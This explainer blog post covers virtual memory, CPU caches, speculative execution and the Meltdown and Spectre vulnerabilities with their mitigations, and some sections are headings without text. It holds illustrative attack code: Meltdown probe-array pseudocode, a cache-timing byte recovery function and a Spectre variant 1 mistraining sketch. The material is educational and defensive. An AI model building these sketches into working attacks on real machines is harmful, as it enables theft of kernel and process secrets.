Meltdown and Spectre, explained

Background

Virtual memory

Figure 1: Virtual memory
Figure 2: Virtual memory translation
  1. A program accesses memory using a virtual address.
  2. The CPU attempts to translate it using the TLB. If the address is found, the translation is used.
  3. If the address is not found, the CPU consults a set of “page tables” to determine the mapping. Page tables are a set of physical memory pages provided by the operating system in a location the hardware can find them (for example the CR3 register on x86 hardware). Page tables map virtual addresses to physical addresses, and also contain metadata such as permissions.
  4. If the page table contains a mapping it is returned, cached in the TLB, and used for lookup. If the page table does not contain a mapping, a “page fault” is raised to the OS. A page fault is a special kind of interrupt that allows the OS to take control and determine what to do when there is a missing or invalid mapping. For example, the OS might terminate the program. It might also allocate some physical memory and map it into the process. If a page fault handler continues execution, the new mapping will be used by the TLB.
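The translation steps above can be sketched in code. This is a hypothetical, simplified model (a flat single-level page table and a hash map standing in for the TLB); real hardware walks multi-level page tables itself, and the OS rather than the program installs mappings:

```cpp
#include <cstdint>
#include <optional>
#include <unordered_map>

// Simplified model of virtual-to-physical translation with a TLB cache.
struct Translation {
  uint64_t physical_page;
  bool user_accessible;  // permission metadata from the page table entry
};

class Mmu {
 public:
  // Returns the physical address, or std::nullopt to model a page fault.
  std::optional<uint64_t> Translate(uint64_t virtual_addr) {
    const uint64_t page = virtual_addr / kPageSize;
    const uint64_t offset = virtual_addr % kPageSize;
    // Step 2: check the TLB first.
    if (auto it = tlb_.find(page); it != tlb_.end()) {
      return it->second.physical_page * kPageSize + offset;
    }
    // Step 3: on a TLB miss, consult the page table.
    if (auto it = page_table_.find(page); it != page_table_.end()) {
      tlb_[page] = it->second;  // step 4: cache the translation in the TLB
      return it->second.physical_page * kPageSize + offset;
    }
    // Step 4 (miss case): no mapping, so raise a page fault to the OS.
    return std::nullopt;
  }

  // Models the OS installing a mapping in the page table.
  void Map(uint64_t virtual_page, uint64_t physical_page, bool user) {
    page_table_[virtual_page] = Translation{physical_page, user};
  }

 private:
  static constexpr uint64_t kPageSize = 4096;
  std::unordered_map<uint64_t, Translation> tlb_;
  std::unordered_map<uint64_t, Translation> page_table_;
};
```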
Figure 3: User/kernel virtual memory mappings
  • Kernel memory is shown in red. It is contained in physical address range 0–99. Kernel memory is special memory that only the operating system should be able to access. User programs should not be able to access it.
  • User memory is shown in gray.
  • Unallocated physical memory is shown in blue.
  • User memory in each process is in the virtual range 0–99, but backed by different physical memory.
  • Kernel memory in each process is in the virtual range 100–199, but backed by the same physical memory.

CPU cache topology

Figure 4: CPU thread, core, package, and cache topology.
  • The basic unit of execution is the “CPU thread” or “hardware thread” or “hyper-thread.” Each CPU thread contains a set of registers and the ability to execute a stream of machine code, much like a software thread.
  • CPU threads are contained within a “CPU core.” Most modern CPUs contain two threads per core.
  • Modern CPUs generally contain multiple levels of cache memory. Cache levels closer to the CPU thread are smaller, faster, and more expensive per byte; levels closer to main memory are larger, slower, and cheaper.
  • Typical modern CPU design uses an L1/L2 cache per core. This means that each CPU thread on the core makes use of the same caches.
  • Multiple CPU cores are contained in a “CPU package.” Modern CPUs might contain 30 or more cores (60 threads) per package.
  • All of the CPU cores in the package typically share an L3 cache.
  • CPU packages fit into “sockets.” Most consumer computers are single socket while many datacenter servers have multiple sockets.

Speculative execution

Figure 5: Modern CPU execution engine (Source: Google images)
if (x < array1_size) {
  y = array2[array1[x] * 256];
}
class Base {
 public:
  virtual void Foo() = 0;
};

class Derived : public Base {
 public:
  void Foo() override { … }
};

Base* obj = new Derived;
obj->Foo();
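The performance effect of branch prediction is easy to observe directly. The following sketch is illustrative (timings are machine-dependent, and an aggressive optimizer may turn the branch into branchless code and erase the effect): summing over sorted data lets the predictor learn a data-dependent branch, while shuffled data defeats it.

```cpp
#include <algorithm>
#include <chrono>
#include <cstdint>
#include <random>
#include <utility>
#include <vector>

// Sum only the elements >= 128. The comparison is a data-dependent branch:
// with sorted input the predictor quickly learns the pattern; with random
// input it mispredicts roughly half the time.
uint64_t SumLarge(const std::vector<uint8_t>& data) {
  uint64_t sum = 0;
  for (uint8_t v : data) {
    if (v >= 128) sum += v;
  }
  return sum;
}

// Returns {seconds_shuffled, seconds_sorted}. On typical hardware (and
// without the compiler vectorizing the loop) the sorted pass is faster.
std::pair<double, double> CompareBranchPrediction() {
  std::vector<uint8_t> data(1 << 22);
  std::mt19937 rng(42);  // fixed seed so the data is reproducible
  for (auto& v : data) v = static_cast<uint8_t>(rng());

  auto time_pass = [&data] {
    auto t0 = std::chrono::steady_clock::now();
    volatile uint64_t sink = SumLarge(data);
    (void)sink;
    return std::chrono::duration<double>(
               std::chrono::steady_clock::now() - t0).count();
  };

  double shuffled = time_pass();
  std::sort(data.begin(), data.end());
  double sorted = time_pass();
  return {shuffled, sorted};
}
```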

Meltdown vulnerability

Rogue data cache load

1. uint8_t* probe_array = new uint8_t[256 * 4096];
2. // ... Make sure probe_array is not cached
3. uint8_t kernel_memory = *(uint8_t*)(kernel_address);
4. uint64_t final_kernel_memory = kernel_memory * 4096;
5. uint8_t dummy = probe_array[final_kernel_memory];
6. // ... catch page fault
7. // ... determine which of 256 slots in probe_array is cached
  1. In the first line, a “probe array” is allocated. This is memory in our process which is used as a side channel to retrieve data from the kernel. How this is done will become apparent soon.
  2. Following the allocation, the attacker makes sure that none of the memory in the probe array is cached. There are various ways of accomplishing this, the simplest of which uses CPU-specific instructions to flush a memory location from the cache.
  3. The attacker then proceeds to read a byte from the kernel’s address space. Remember from the previous discussion of virtual memory and page tables that most modern kernels map the entire kernel virtual address space into every user process. Operating systems rely on the permission bits in each page table entry: user mode programs are not allowed to access kernel memory, and any such access results in a page fault. That is indeed what will eventually happen at step 3.
  4. However, modern processors also perform speculative execution and will execute ahead of the faulting instruction. Thus, steps 3–5 may execute in the CPU’s pipeline before the fault is raised. In this step, the byte of kernel memory (which ranges from 0–255) is multiplied by the page size of the system, which is typically 4096.
  5. In this step, the multiplied byte of kernel memory is used to read from the probe array into a dummy value. Multiplying the byte by 4096 prevents a CPU feature called the “prefetcher” from reading more data than we want into the cache.
  6. By this step, the CPU has realized its mistake and rolled back to the faulting instruction in step 3. However, the results of the speculated instructions are still visible in cache. The attacker uses operating system functionality to trap the faulting instruction and continue execution (e.g., handling SIGSEGV).
  7. In step 7, the attacker iterates through and sees how long it takes to read each of the 256 possible bytes in the probe array that could have been indexed by the kernel memory. The CPU will have loaded one of the locations into cache and this location will load substantially faster than all the other locations (which need to be read from main memory). This location is the value of the byte in kernel memory.
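Step 7’s timing readout can be sketched as follows. This is a hypothetical illustration: real exploits use a cycle-accurate counter such as rdtscp, while std::chrono is shown here for portability and is generally too coarse for a working attack.

```cpp
#include <chrono>
#include <cstdint>

// Time a load from each of the 256 probe slots. The slot the speculative
// access pulled into cache loads fastest, and its index is the value of
// the leaked kernel byte. (Real attacks compare against a calibrated
// threshold and repeat to filter noise; taking the minimum is a
// simplification.)
uint8_t RecoverByte(const uint8_t* probe_array) {
  uint64_t best_time = UINT64_MAX;
  uint8_t best_guess = 0;
  for (int i = 0; i < 256; i++) {
    const volatile uint8_t* addr = &probe_array[i * 4096];
    auto start = std::chrono::steady_clock::now();
    uint8_t value = *addr;  // the timed load
    auto elapsed = std::chrono::steady_clock::now() - start;
    (void)value;
    const uint64_t ticks = static_cast<uint64_t>(elapsed.count());
    if (ticks < best_time) {
      best_time = ticks;
      best_guess = static_cast<uint8_t>(i);
    }
  }
  return best_guess;
}
```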

Meltdown mitigations

Kernel page table isolation (KPTI)

Figure 6: Kernel page table isolation

Spectre vulnerability

Bounds check bypass (Spectre variant 1)

if (x < array1_size) {
  y = array2[array1[x] * 256];
}
  1. The attacker controls x.
  2. array1_size is not cached.
  3. array1 is cached.
  4. The CPU guesses that x is less than array1_size. (CPUs employ various proprietary algorithms and heuristics to determine whether to speculate, which is why attack details for Spectre vary between processor vendors and models.)
  5. The CPU executes the body of the if statement while it is waiting for array1_size to load, affecting the cache in a similar manner to Meltdown.
  6. The attacker can then determine the actual value of array1[x] via one of various methods. (See the research paper for more details of cache inference attacks.)
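Putting the steps together, the attack setup around the gadget above can be sketched like this (the names victim and attack are hypothetical; the cache-flush and timing steps are only indicated in comments because they are hardware-specific):

```cpp
#include <cstddef>
#include <cstdint>

// The gadget from the snippet above, wrapped in a callable function.
size_t array1_size = 16;
uint8_t array1[16];
uint8_t array2[256 * 4096];
volatile uint8_t y;

void victim(size_t x) {
  if (x < array1_size) {          // the branch the attacker mistrains
    y = array2[array1[x] * 256];  // runs speculatively even for out-of-bounds x
  }
}

void attack(size_t malicious_x) {
  // Step 4 setup: many in-bounds calls teach the predictor "branch taken".
  for (size_t i = 0; i < 30; i++) {
    victim(i % array1_size);
  }
  // Step 2: evict array1_size from cache (e.g. _mm_clflush on x86) so the
  // bounds check stalls and the CPU speculates past it.
  victim(malicious_x);  // step 5: architecturally safe, microarchitecturally leaks
  // Step 6: recover array1[malicious_x] by timing loads from array2 slots.
}
```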

Branch target injection (Spectre variant 2)

Spectre mitigations

Static analysis and fencing (variant 1 mitigation)

Retpoline (variant 2 mitigation)

jmp *%r11

call set_up_target;  (1)
capture_spec:        (4)
  pause;
  jmp capture_spec;
set_up_target:
  mov %r11, (%rsp);  (2)
  ret;               (3)
  1. In this step the code calls a memory location that is known at compile time (a hard-coded offset, not an indirect branch). This places the address of the capture_spec label on the stack as the return address.
  2. The return address placed by the call is overwritten on the stack with the actual indirect jump target.
  3. A return is performed, jumping to the real target.
  4. When the CPU speculatively executes, it will return into an infinite loop! Remember that the CPU will speculate ahead until memory loads are complete. In this case, the speculation has been manipulated to be captured into an infinite loop that has no side effects that are observable to an attacker. When the CPU eventually executes the real return it will abort the speculative execution which had no effect.
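In practice, compilers emit this thunk automatically for indirect branches. Assuming an x86-64 target and a hypothetical source file victim.c, the relevant flags are:

```shell
# GCC spelling (7.3+): replace indirect branches with retpoline thunks.
gcc -O2 -mindirect-branch=thunk -c victim.c

# Clang spelling (6.0+):
clang -O2 -mretpoline -c victim.c
```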

IBRS, STIBP, and IBPB (variant 2 mitigation)

  • Indirect Branch Restricted Speculation (IBRS)
  • Single Thread Indirect Branch Predictors (STIBP)
  • Indirect Branch Predictor Barrier (IBPB)
  • IBRS both flushes the branch prediction cache between privilege levels (user to kernel) and disables branch prediction on the sibling CPU thread. Recall that each CPU core typically has two CPU threads. It appears that on modern CPUs the branch prediction hardware is shared between the threads. This means that not only can user mode code poison the branch predictor prior to entering kernel code, code running on the sibling CPU thread can also poison it. Enabling IBRS while in kernel mode essentially prevents any previous execution in user mode and any execution on the sibling CPU thread from affecting branch prediction.
  • STIBP appears to be a subset of IBRS that just disables branch prediction on the sibling CPU thread. As far as I can tell, the main use case for this feature is to prevent a sibling CPU thread from poisoning the branch predictor when running two different user mode processes (or virtual machines) on the same CPU core at the same time. It’s honestly not completely clear to me right now when STIBP should be used.
  • IBPB appears to flush the branch prediction cache for code running at the same privilege level. This can be used when switching between two user mode programs or two virtual machines to ensure that the previous code does not interfere with the code that is about to run (though without STIBP I believe that code running on the sibling CPU thread could still poison the branch predictor).
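On Linux (kernel 4.15 and later), sysfs reports which of these mitigations the running kernel has enabled; KPTI appears under meltdown as “Mitigation: PTI”, and retpoline/IBRS/IBPB/STIBP status appears under spectre_v2:

```shell
# Print each reported vulnerability and its mitigation status, if the
# kernel exposes the sysfs interface.
for f in /sys/devices/system/cpu/vulnerabilities/*; do
  if [ -r "$f" ]; then
    echo "$(basename "$f"): $(cat "$f")"
  fi
done
```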

Conclusion

Further reading

Matt Klein, Engineer @lyft (https://mattklein123.dev/)